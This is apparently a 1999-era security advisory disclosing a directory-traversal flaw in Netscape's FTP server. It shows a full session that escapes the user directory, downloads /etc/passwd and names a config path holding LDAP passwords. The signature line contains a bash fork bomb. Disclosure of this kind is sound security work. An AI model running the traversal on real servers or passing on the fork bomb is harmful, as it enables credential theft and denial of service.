netscape.ftp.txt

`Standard disclaimer applies. These are my private oppinions and  
observations.  
  
Netscape Professional Services FTP server is used on high-performance  
servers for accessing virtual webserver accounts etc. It works with LDAP  
and seems to be quite often shipped by Sun with ISP instalations.  
  
Due to poor coding, whole virtual server structure, LDAP server and other  
parts of system are exposed to trivial attacks. There are also several  
overflows, but who cares, it's much easier:  
  
Long Live the Programmers!  
  
$ ftp ftp.XXXX.xxx  
Connected to ftp.XXXX.xxx.  
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services  
220 You will be logged off after 1200 seconds of inactivity.  
Name (ftp.XXXX.xxx:lcamtuf): anonymous  
331 Anonymous user OK, send e-mail address as password.  
Password:  
230 Logged in OK  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp> cd ../../../dupa  
550 Can't change directory to  
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such  
file or directory  
  
[Well... this won't work... uh, lovely physical path, btw ;]  
  
ftp> cd /../../../dupa  
550 Can't change directory to  
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or  
directory  
ftp> cd /../../../../dupa  
550 Can't change directory to  
"/www1/customer/www.XXXX.xxx/a/dupa" because  
No such file or directory  
  
[Erm? Good God!]  
  
ftp> cd /../../../../../../../../etc/dupa  
550 Can't change directory to "/etc/dupa" because No such file or  
directory  
ftp> cd /../../../../../../../../etc/  
250 CWD command successful.  
ftp> get /../../../../../../../../etc/passwd KUKU  
local: KUKU remote: /../../../../../../../../etc/passwd  
200 PORT successfull, connected to A.B.C.D port 62437  
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.  
150 Opening data connection  
226 File downloaded successfully (602 bytes, 602 bytes xmitted)  
602 bytes received in 1.71 secs (0.34 Kbytes/sec)  
ftp> quit  
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.  
221 CPU time spent on you: 0.100 seconds.  
  
$ cat KUKU  
root:x:0:1:Super-User:/:/sbin/sh  
daemon:x:1:1::/:  
bin:x:2:2::/usr/bin:  
sys:x:3:3::/:  
adm:x:4:4:Admin:/var/adm:  
...  
  
Consequences:  
-------------  
  
- downloading / uploading any files to remote system,  
regardless of (poorly) implemented limits, with  
ftp daemon privledges (you can exploit eg. /tmp races,  
download vital files from system or other accounts etc)  
  
- this ftp server supports LDAP users; different LDAP  
accounts are served on single physical UID. It means,  
any user can access and eventually overwrite files  
on other accounts; as it's used in cooperation with  
webserver, usually virutal web servers are affected,  
  
- by accessing eg.  
/../../../../../../../../opt/netscape/ftpd/conf/ftpd.ini,  
you can simply grab LDAP passwords.  
  
Fix:  
----  
  
? Switching to open-source will be good. To developers: man chroot.  
  
_______________________________________________________  
Michal Zalewski [[email protected]] [tp.internet/security]  
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:  
=-----=> God is real, unless declared integer. <=-----=  
  
`